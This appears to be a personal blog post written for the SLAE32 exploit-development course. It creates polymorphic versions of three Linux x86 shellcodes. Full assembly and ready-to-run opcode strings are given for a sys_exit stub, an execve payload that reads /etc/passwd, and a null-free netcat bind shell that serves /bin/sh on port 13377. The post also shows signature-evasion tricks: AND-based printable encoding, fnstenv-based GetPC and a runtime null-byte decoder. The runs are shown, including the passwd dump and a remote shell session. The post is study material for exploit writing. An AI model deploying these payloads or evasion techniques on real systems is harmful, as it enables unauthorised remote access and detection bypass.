SLAE32 Assignment 6 - Polymorphic Shellcode

This post introduces the 6th mission of my SLAE32 journey.

If the previous assignment was incredible, this one was even cooler because I could apply what I learned in the Msfvenom analysis assignment to develop polymorphic versions of existing shellcodes.

Some existing tools, such as ADMutate, will XOR-encrypt the existing shellcode and attach the loader code to it. This is useful, but writing polymorphic shellcodes without a tool is a much better learning experience.

Introduction

The SLAE32 6th assignment task is to select three shellcode payloads from the shell-storm and create polymorphic versions of them without increasing the size of the shellcode by more than 50%;

Bonus points if we can make it shorter in length compared to the original.

Shellcode 1 - sys_exit(0)

This shellcode was written by gunslinger_, and is located here. This shellcode only calls exit() with 0 as exit code.

Size: 8 bytes

/*
Name   : 8 bytes sys_exit(0) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslinger.devilzc0de.com
tested on : linux debian
*/

char *bye=
 "\x31\xc0"                    /* xor    %eax,%eax */
 "\xb0\x01"                    /* mov    $0x1,%al */
 "\x31\xdb"                    /* xor    %ebx,%ebx */
 "\xcd\x80";                   /* int    $0x80 */

int main(void)
{
		((void (*)(void)) bye)();
		return 0;
}

This is a short code. We have minimum alternatives to work with.

global _start

section .text
_start:

xor ebx, ebx    ; clear ebx
mul ebx         ; using mul to clear eax and edx
inc eax         ; put exit(1) syscall in eax
syscall

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ ../../../../assembler.sh 7-byte-poly_sys_exit.nasm

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 7

"\x31\xdb\xf7\xe3\x40\x0f\x05"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xdb\xf7\xe3\x40\x0f\x05";

main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ ./shellcode 
Shellcode Length: 7

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ echo $?
0

Size: 7 bytes

Reduced 1 byte which is less 12,5% in size compared to the original.

Shellcode 2 - cat passwd Shellcode

This shellcode was written by fb1h2s, and is located here. This shellcode will read the /etc/passwd file.

Size: 43 bytes

#include <stdio.h>
 
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // pu sh dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h
 
int main()
{
(*(void (*)()) shellcode)();
 
return 0;
}
 
 
/*
shellcode[]=	"\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" 
		"\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/

We will use the assembly comments to know what the code is doing. It appears to use some tricks we have already used in past assignments, so we’ll add junk instructions to change them a bit in the code.


global _start
section .text
_start:
        mov eax, -1				; put 0xfffff in eax
        inc eax					; eax becomes zero
		cdq						; zeroes edx
        lea ebx, [esp-0xc]		;
        push edx
        push dword 0x7461632f   ; tac/
        push dword 0x6e69622f   ; nib/
        
        lea ecx, [ebx-0x10]     ; use ebx as our "stack pointer"
        
        push edx
        push dword 0x64777374   ; dwst - changes a 's' for a 't'
        push dword 0x61702f2f   ; ap//
        push dword 0x6374652f   ; cte/

        mov ax, 0x4a2f 			; using AND operation because results in printable ASCII characters

        push edx
        xor byte [esp+0xc], 0x7	; replacing 't' for a 's'
        push ecx
        push ebx
        mov ecx, esp
        and ax,0x358b      		; becomeoxb - using AND operations to resulting in nulling part of eax without null bytes
        int 0x80

From the beginning of the code, eax and edx, become zero. For some instructions below, we changed one letter from /etc/passwd to /etc/patswd, which we replaced later the t with an s.

The coolest trick here is the use of AND operations to zero eax. A really cool challenge because it is an alternative to XOR operations. AND logic operations assemble into printable ASCII characters range (from 0x33 to 0x7e). XOR logic operations don’t assemble into the printable ASCII range.

Some buffers don’t allow unprintable characters. This way we can exploit what was previously unexploitable.

Let’s use an example to show how it works.

ASCII Printable Polymorphic Shellcode

The AND logic table transforms bits as follows:

1 and 1 = 1
0 and 0 = 0
1 and 0 = 0
0 and 1 = 0

Because the only case where the result is a 1 is when both bits are 1, if two inverse values are ANDed onto EAX, EAX will become zero.

Binary                                Hexadecimal
    1000101010011100100111101001010       0x454e4f4a
AND 0111010001100010011000000110101   AND 0x3a313035
------------------------------------  ---------------
    0000000000000000000000000000000       0x00000000

Using this technique the two printable 32-bit values are also bitwise inverses of each other.

What’s the advantage?

eax can be zeroed without using null bytes, and the outcome is assembled machine code will be printable text.

From https://www.dmi.unipg.it/~bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html

Getting back to our exercise, let’s use our code to demonstrate how we leverage this technique for our purpose.

The instructions used with this technique are as follows:

mov ax, 0x4a2f
and ax, 0x358b

The main goal is eax value become 0xb (execve syscall). So let’s see below why we used these values to perform the AND operation and the result of it.

Binary                    Hexadecimal
    0100 1010 0010 1111       0x4a2f
AND 0011 0101 1000 1011   AND 0x358b
-----------------------  -------------
    0000 0000 0000 1011       0x000b

These two values are the inverse of each in the higher 8 bits, but in the low 8 bits, they result in 0xb, the execve syscall.

Will an antivirus or a human able to spot this by only looking at it?

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ ../../../assembler.sh cat_passwd.nasm                              

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 61

"\xb8\xff\xff\xff\xff\x40\x99\x8d\x5c\x24\xf4\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8d\x4b\xf0\x52\x68\x74\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x66\xb8\x2f\x4a\x52\x80\x74\x24\x0c\x07\x51\x53\x89\xe1\x66\x25\x8b\x35\xcd\x80"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xb8\xff\xff\xff\xff\x40\x99\x8d\x5c\x24\xf4\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8d\x4b\xf0\x52\x68\x74\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x66\xb8\x2f\x4a\x52\x80\x74\x24\x0c\x07\x51\x53\x89\xe1\x66\x25\x8b\x35\xcd\x80";

main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ ./shellcode 
Shellcode Length: 61
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:106:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:107:113:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:108:117:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:109:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:111:120::/var/lib/saned:/usr/sbin/nologin
colord:x:112:121:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
lightdm:x:114:122:Light Display Manager:/var/lib/lightdm:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
edu:x:1000:1000:edu:/home/edu:/usr/bin/zsh

Size: 61 bytes

Increased 41,9% which reflects in more 17 bytes.

Shellcode 3 - nc -lvve/bin/sh -p13377

This was by far the most challenging exercise I had during the course

At some point, I turned it into a personal thing because I decided to put the techniques I learned from the msfvenom shellcode analysis assignment into this exercise, and nothing seemed to work.

One constraint I needed to bypass was that I generated the msfvenoom shellcodes with null bytes.

I couldn’t use null bytes this time, so I needed to review how msfvenom generated shellcode without null bytes and tried to apply that methodology to this task.

This way, I will present two polymorphic versions of this shellcode: one with null bytes and another with null-free shellcode.

Then, we can compare the differences between them and reflect how hard is to develop a null-free shellcode.

The following quote tells the mindset we should have not to give up when we face a complex problem and resumes how difficult it was for me to make it work.

  Intelligence is the ability to adapt to change,
                                                by Stephen Hawking

After this, let’s get to the point.

This shellcode was written by an Anonymous user, and is located here. As the shellcode description says, this shellcode will listen on port 13377 using netcat and give /bin/sh to the connecting attacker.

The original shellcode does not have any comments, so I added some to be easier to understand its internals.

Size: 62 bytes

linux x86 nc -lvve/bin/sh -p13377 shellcode
This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
Author: Anonymous
Site: http://chaossecurity.wordpress.com/
Here is code written in NASM
/////////////////////////////
section .text
    global _start
_start:
xor eax,eax
xor edx,edx
push 0x37373333	; 7733
push 0x3170762d	; 1pv-
mov edx, esp
push eax
push 0x68732f6e	; hs/n
push 0x69622f65	; ib/e
push 0x76766c2d	; vvl-
mov ecx,esp
push eax
push 0x636e2f2f	; cn//
push 0x2f2f2f2f	; ////
push 0x6e69622f	; nib/
mov ebx, esp
push eax
push edx
push ecx
push ebx
xor edx,edx
mov  ecx,esp
mov al,11		; execve syscall
int 0x80
//////////////////////////////////
And here is objdump from which you can see the shellcode
//////////////////////////////////
teo@teo-desktop ~ $ objdump -d a.out
a.out:     file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
 8048060:   31 c0                   xor    %eax,%eax
 8048062:   31 d2                   xor    %edx,%edx
 8048064:   68 33 33 37 37          push   $0x37373333
 8048069:   68 2d 76 70 31          push   $0x3170762d
 804806e:   89 e2                   mov    %esp,%edx
 8048070:   50                      push   %eax
 8048071:   68 6e 2f 73 68          push   $0x68732f6e
 8048076:   68 65 2f 62 69          push   $0x69622f65
 804807b:   68 2d 6c 76 76          push   $0x76766c2d
 8048080:   89 e1                   mov    %esp,%ecx
 8048082:   50                      push   %eax
 8048083:   68 2f 2f 6e 63          push   $0x636e2f2f
 8048088:   68 2f 2f 2f 2f          push   $0x2f2f2f2f
 804808d:   68 2f 62 69 6e          push   $0x6e69622f
 8048092:   89 e3                   mov    %esp,%ebx
 8048094:   50                      push   %eax
 8048095:   52                      push   %edx
 8048096:   51                      push   %ecx
 8048097:   53                      push   %ebx
 8048098:   31 d2                   xor    %edx,%edx
 804809a:   89 e1                   mov    %esp,%ecx
 804809c:   b0 0b                   mov    $0xb,%al
 804809e:   cd 80                   int    $0x80

As I said above, I had a completely different approach than others for this exercise.

The inspiration was the methodology used by the previously analyzed msfvenom shellcodes.

I will first present the shellcode with null bytes.

Null Byte Shellcode

xor eax, eax
cdq

call $+ 0xf
sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
add    byte [eax], al
pop edx

call $ + 0x13
sub   eax,0x6576766c
das
bound  ebp, [ecx+0x6e]
das
jae $+0x6a
add    byte [eax], al
pop ecx

call $ + 0x12
das
bound  ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],ax
pop ebx

push eax
push edx
push ecx
push ebx

mov eax, 0x454e4a2f
;add ax, 0x1000

xor edx,edx
mov  ecx,esp
and eax,0x3a31358b
int 0x80

Let’s divide and conquer one more time.

The code is divided into parts related to each command argument to be executed by execve.

A call and a pop instruction delimit each part. The instructions inside this part are used to prepare an argument. The pop $Register instruction is used to put the address pointer of the argument from esp to the related register depending on each argument position of execve we are dealing with.

4th argument - pop edx
3rd argument - pop ecx
2nd argument - pop ebx
1st argument - pop eax

So the pop instruction will tell us what execve argument we were preparing. This exact process is used to prepared the syscall arguments but with obfuscated code.

For example:

xor eax, eax            
cdq                     

call $+ 0xf				; Start
sub  eax,0x33317076
xor  esi,DWORD [edi]
aaa
add  byte [eax], al
pop edx					; end

call $+0xf tells us we are looking at a “piece” of code that is preparing the 4th argument because the end of this part iss pop edx.

Between this instruction, it seems that we have assembly instruction that doesn’t make any sense that will be executed by the CPU but, this is not the case.

By this time, you should be familiar with the x86 calling conventions and how call instruction behaves.

Just a reminder, the call instruction pushes the return address (address immediately after the call instruction) on the stack and changes the eip to the call destination. This effectively transfers control to the call target and begins execution there.

So what are these instructions doing exactly?

xor eax, eax            ; zeroes eax
cdq                     ; zeroes edx (saves space)

call $ + 0xf				; jumps to pop edx
sub  eax,0x33317076
xor  esi,DWORD [edi]
aaa
add  byte [eax], al     
pop edx             	; saving execve 4th argument

Firstly, we cleareax and edx registers, then we use call the following instruction address and jump to the pop edx instruction.

Why $ + 0xf?

Well, the $ holds the address of the current instruction. As an example, let’s use the above code and compare the disassembled output with objdump -M intel -d netcat_nullbyte_shellcode

xor eax, eax
cdq

call $+ 0xf             ; $ holds address of call opcode
sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
add    byte [eax], al
pop edx
---
08049000 <_start>:
 8049000:       31 c0                   xor    eax,eax
 8049002:       99                      cdq    
 8049003:       e8 0a 00 00 00          call   8049012 <_start+0x12>
 8049008:       2d 76 70 31 33          sub    eax,0x33317076
 804900d:       33 37                   xor    esi,DWORD PTR [edi]
 804900f:       37                      aaa    
 8049010:       00 00                   add    BYTE PTR [eax],al
 8049012:       5a                      pop    edx

Checking the opcodes (2nd column), there is a distance of 15 bytes between pop edx and the call instruction.

Look how the call instruction introduces null bytes when redirects execution with to an instruction with a short distance.

So, we are storing the same bytes in edx as the original shellcode does. Instead of doing push instructions and putting the bytes on the stack.

Approach 1 - Original shellcode

; Not forget these are placed in Little-Endian format

push 0x37373333
push 0x3170762d

Approach 2 - Polymorphic version

We place the exact same bytes as opcodes in the code and put the address of the first byte in edx

2d 76 70 31 33          sub    eax,0x33317076
33 77 04                xor    esi,DWORD PTR [edi+0x4]
37                      aaa
00 40 01                add    BYTE PTR [eax+0x1],al

Hex bytes: **0x2D, 0x76, 0x70, 0x31, 0x33, 0x33, 0x77, 0x04, 0x37**, 0x00

Comparing both approaches, we see they have the same exact bytes. We can check this with gdb

Approach 2 has the disadvantage of putting null bytes because we need to specify the end of them, while with approach 1, we push a zeroed register which does have null bytes.

This is why I struggled with Approach 2 and why I need to rethink and completely change my approach to avoid null bytes.

Null-Free Shellcode


xor eax,eax

mov al, 0x8
fnop
jmp short argParser

sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
nop                     ; nops will be changed to nulls in runtime

lea edx, [esi+4]

mov al, 0xc
fnop
jmp short argParser

sub   eax,0x6576766c    ; \xe8\x0e\x00\x00\x00
das
bound  ebp, [ecx+0x6e]
das
jae $+0x6a
nop


lea ecx, [esi+4]

;call $ + 0x12   ;\xe8\x0d\x00\x00\x00

mov al, 0xc
fnop
jmp short argParser

das
bound  ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],bx

lea ebx, [esi+4]

push eax
push edx
push ecx
push ebx

cdq             ; clear edx because is one of execve's arguments --> char *const envp[]
mov  ecx,esp
mov al, 0xb
int 0x80

argParser:          ; similar to jmp-call-pop but calls to a nop byte which can
                    ; assmuming al has the right distance
    fnstenv [esp-0xc]
    pop esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder
    lea edi, [esi + 0x4+eax+0x1]
    xor eax,eax
    jmp edi

The approach idea is the same as Approach 2 from the Null Byte shellcode, but this one uses the fnstenv technique from the x87 FPU to store the FPU related instruction address instead of using call. This technique was mentioned during the course, but it involved research on our own to understand how we can use it.

The logic needed to be completely redesigned to put the shellcode working with this technique.

The FNSTENV Technique

There are alternative methods in shellcode for finding the value of the EIP register using instructions that contain no null bytes. One of those methods uses an FPU instruction.

Below is the image from the FPU section in Intel’s manual, that shows how the FPU memory organization.

When the fnstenv instruction is preceded by some other FPU instruction (in our case, it is fnop), then the result of the fnstenv is pushed onto the stack, and the result is none other than the address of the previous FPU instruction.

For this exercise, I used fnop instruction. It can be fldz or other FPU-related instruction to use this technique. Just make sure to be an FPU instruction.

PoC code with `fnstenv`

l1: fnop
  fnstenv [esp-0c]  ; FPU Instruction Pointer (FIP)
  pop eax
l2: ...

The result of the above two FPU instructions will be the address of fnop instruction gets saved onto the stack.

When l2 is reached, the value in the eax register will be the address of l1.

Debugging fnstenv

Debugging the code with the fnstenv technique was a complete madness to my head.

I figured out that performing single-stepping debugging over the fnop instruction results in a completely different value in the eax register. This means that the code could be altered in a very subtle way.

So, the solution was to place a breakpoint in fnop and the instruction after the fnstenv. In our code is pop esi

mov al, 0x8
fnop                                ; breakpoint here
jmp short argParser
[...]
argParser:          

    fnstenv [esp-0xc]
    pop esi                         ; breakpoint here
    mov byte [esi + 0x4 + eax], ah 
    lea edi, [esi + 0x4+eax+0x1]
    xor eax,eax
    jmp edi

Between these instructions I executed the program normally to avoid the unstable behaviour fnstenv causes when performing single-step debugging.

Debug section taken from VirtualPC-specific section in https://www.virusbulletin.com/virusbulletin/2010/11/anti-unpacker-tricks-part-fourteen

Methodology

As well as the previous shellcode, the code is divided into parts related to each argument of the command to be executed by execve.

Each part is delimited this time by mov, fnop, jmp and lea instructions. The instructions inside this part are used to prepare one of the execve’s arguments.

The mov, fnop, jmp instructions prepare the environment to store the eip address and the bytes in the related register to the execve argument.

The lea $REGISTER, [esi+4] instruction is used to put the address pointer from esp to the related register depending on each argument position of execve we are dealing with.

So the lea instruction will tell us what execve argument we were preparing.

Let’s take a “piece” of code for one of the arguments from our shellcode and dig into it.

We’ll be analyzing what we put in the edx register.

; start of edx section argument
mov al, 0x8             ; distance from sub to nop
fnop                    ; FPU instruction used to store instruction pointer in FPU stack
jmp short argParser

sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
nop                     ; avoid null byte. changed in runtime to null

lea edx, [esi+4]
; end of edx section argument
;----------------------------------------
; starting preparing next argument
mov al, 0xc

[...]

argParser:          
                    
    fnstenv [esp-0xc]              ; Storing fnop address onto the stack
    pop esi                        ; put stored FIP address in esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder --> change nop to null
    lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction
    xor eax,eax                    ; zeroed eax before executing next argument section
    jmp edi                        ; jump to instruction lea edx, [esi+4]

First, we move to al the distance from the first byte of the argument to be placed in edx to the nop instruction. We don’t consider fnop and jmp opcodes because these are always equal across every argument section, so they are considered in the ArgParser branch.

We can use objdump to verify that the distance between sub eax,0x33317076, and nop is 8 bytes.


8049004:       d9 d0                   fnop
8049006:       eb 43                   jmp    804904b <argParser>
8049008:       2d 76 70 31 33          sub    eax,0x33317076
804900d:       33 37                   xor    esi,DWORD PTR [edi]
804900f:       37                      aaa
8049010:       90                      nop

0x8049010 - 0x8049008 = 0x8 bytes

Then, we execute an FPU instruction to store the fnop address in the FPU stack. This address will be the reference to our further actions. Next, we jump to the ArgParser branch.

mov al, 0x8             ; distance from sub to nop
fnop                    ; FPU instruction used to store instruction pointer in FPU stack
jmp short argParser

In this branch is where all the magic happens.

argParser:          
                    
    fnstenv [esp-0xc]              ; Storing fnop address onto the stack
    pop esi                        ; put stored FIP address in esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder --> change nop to null
    lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction
    xor eax,eax                    ; zeroed eax before executing next argument section
    jmp edi                        ; jump to instruction lea edx, [esi+4]

First, we store the fnop address on the stack and put that address in the esi register.

Then, remember that nop (0x90) byte we put at the end of the section argument?

We need to put a null byte in the end, but we can’t put it explicitly. So we are going to change it to a null byte with the following single instruction

mov byte [esi + 0x4 + eax], ah  ; ah is always zero

Basically, we are moving ah, which is the ax eight most significant bits register to the address of the nop byte. We know that ah is always null because at the beginning of the shellcode, we have xor eax, eax, and in the ArgParser branch and we just work with al in each argument section. So, ah byte is not touched during our operations.

This way, a null byte is placed in the argument bytes marking the end of the string bytes.

Let’s demonstrate it in gdb.

After changing 0x90 to 0x00, three new instructions appeared.

That null byte changed also the fnstenv instruction.

What a simple thing can do, right?

After performing this operation we need to store the argument address in edx. Basically, we need to jump to the lea edx, [esi+4] instruction.

The way our code is doing this is by loading to edi the lea address based on the esi register which holds the fnop instruction address, adding the distance from fnop to esi which was the former nop byte, and adding 1 more byte to reach lea edx, [esi+4] from the fnop instruction.

lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction

The most tricky is done, we just need to clear eax to prepare the next argument section and jump to put the argument address in edx using edi.

xor eax,eax                    ; zeroed eax before executing next argument section
jmp edi                        ; jump to instruction lea edx, [esi+4]

Then, it is just doing the same for the other arguments.

We end our shellcode calling execve with usual process.

push eax        ; 0x0
push edx        ; -vp13377
push ecx        ; -lvve/bin/sh
push ebx        ; /bin//////nc

cdq             ; clear edx because is one of execve's arguments --> char *const envp[]
mov  ecx,esp
mov al, 0xb     ; execve syscall
int 0x80

hecking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ ../../../../assembler.sh poly_netcat.nasm                                                                                                                                                                150 ↵

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 92

"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0\x0b\xcd\x80\xd9\x74\x24\xf4\x5e\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0"
"\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b"
"\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0\x0b"
"\xcd\x80\xd9\x74\x24\xf4\x5e\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7";


main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:11:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~
╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ ./shellcode
Shellcode Length: 92
listening on [any] 13377 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41344

-----------

╭─edu@debian ~/Desktop/slae_x86/assignments ‹main●› 
╰─$ nc -nv 127.0.0.1 13377
(UNKNOWN) [127.0.0.1] 13377 (?) open
id
uid=1000(edu) gid=1000(edu) groups=1000(edu),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
ls
poly_netcat
poly_netcat.nasm
poly_netcat.o
shellcode
shellcode.c

Size: 92 bytes

After some tuning we have a 92-byte polymorphic shellcode. An increase of 28 bytes in size which corresponds to 43.75%.

A curious Note

After put to work this shellcode I checked how shikata_ga_nai encodes shellcode.

It appars to have some similarities to what have done :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Now at: https://www.pentesteracademy.com/course?id=3

Student ID: PA-31319

All the source code files are available on GitHub at https://github.com/0xnibbles/slae_x86

Introduction#

Shellcode 1 - sys_exit(0)#

Shellcode 2 - cat passwd Shellcode#

ASCII Printable Polymorphic Shellcode#

Shellcode 3 - nc -lvve/bin/sh -p13377#

Sharing some thoughts#

Null Byte Shellcode#

So what are these instructions doing exactly?#

Null-Free Shellcode#

The FNSTENV Technique#

PoC code with fnstenv#

Debugging fnstenv#

Methodology#

A curious Note#

Introduction

Shellcode 1 - sys_exit(0)

Shellcode 2 - cat passwd Shellcode

ASCII Printable Polymorphic Shellcode

Shellcode 3 - nc -lvve/bin/sh -p13377

Sharing some thoughts

Null Byte Shellcode

So what are these instructions doing exactly?

Null-Free Shellcode

The FNSTENV Technique

PoC code with `fnstenv`

Debugging fnstenv

Methodology

A curious Note